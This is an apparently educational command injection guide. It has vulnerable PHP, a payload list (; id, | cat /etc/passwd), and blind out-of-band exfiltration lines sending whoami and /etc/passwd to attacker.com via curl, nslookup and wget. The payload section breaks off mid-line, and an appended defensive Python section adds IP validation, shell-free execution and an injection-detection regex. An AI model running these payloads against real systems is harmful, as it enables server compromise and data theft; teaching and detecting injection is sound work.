Key Takeaways
- Command injection = RCE on server
- Avoid system() functions with user input
- Blind injection detectable via timing/OOB
- Critical severity - immediate server compromise
1. What is Command Injection?
Command injection occurs when an application passes user-controlled data to a system shell. Attackers can inject additional commands that execute with the application's privileges.
Vulnerable Code
<?php
# PHP (vulnerable): user input is concatenated straight into a shell command line
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
# Attack: ?ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd
2. Injection Payloads
# Command separators (Linux)
; # Command terminator
| # Pipe
|| # OR (runs if first fails)
& # Background (first command is backgrounded, second runs regardless)
&& # AND (runs if first succeeds)
`cmd` # Command substitution
$(cmd) # Command substitution
# Examples
; id
| id
|| id
& id
&& id
`id`
$(id)
; whoami
| cat /etc/passwd
3. Blind Command Injection
# Time-based detection
; sleep 10
| sleep 10
# Out-of-band exfiltration
; curl attacker.com/?data=$(whoami)
; nslookup $(whoami).attacker.com
; wget http://attacker.com/$(cat /etc/passwd | base64)
# Write to web directory
; echo "
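The fix the takeaways call for, as an added example that is not part of the original page: a hardened counterpart of the vulnerable ping handler (strict IP allow-list, argv passed to the OS without a shell, timeout) together with a check that flags the section 2 separators and section 3 sleep/OOB markers in access-log queries. The log lines, the ping.php path and the function names are constructed for this example.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus


def validate_ip(value: str) -> str:
    """Allow-list check: a ping endpoint needs exactly one literal IP address."""
    return str(ipaddress.ip_address(value.strip()))  # raises ValueError on anything else


def build_ping_argv(user_ip: str) -> list:
    """argv list handed to the OS without a shell, so ';', '|', '&', '$(...)' are never parsed."""
    return ["ping", "-c", "4", validate_ip(user_ip)]


def run_ping(user_ip: str, timeout: float = 15.0) -> subprocess.CompletedProcess:
    """Hardened counterpart of system("ping -c 4 " . $ip): validated argv, no shell, timeout."""
    return subprocess.run(build_ping_argv(user_ip), capture_output=True, text=True, timeout=timeout)


# Detection side: separators from section 2 and blind/OOB markers from section 3,
# matched against the URL-decoded query string of each request.
INJECTION_RE = re.compile(r"[;|&`]|\$\(|\bsleep\s+\d+|\b(?:curl|wget|nslookup)\b")


def suspicious_requests(access_log: str) -> list:
    """Return (line_no, decoded_query) for log lines whose query carries injection markers."""
    hits = []
    for n, line in enumerate(access_log.splitlines(), 1):
        m = re.search(r'"(?:GET|POST) \S*\?(\S*)', line)
        if not m:
            continue
        query = unquote_plus(m.group(1))
        if INJECTION_RE.search(query):
            hits.append((n, query))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping.php?ip=8.8.8.8 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /ping.php?ip=8.8.8.8%3B+sleep+10 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:31 +0000] "GET /ping.php?ip=8.8.8.8%7C+id HTTP/1.1" 200 540
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    print(build_ping_argv("8.8.8.8"))
    print(suspicious_requests(SAMPLE_LOG))
```

The second request in the sample log is the time-based probe from section 3; note the 22-second gap to the same client's next request, which is the timing signal the takeaways mention.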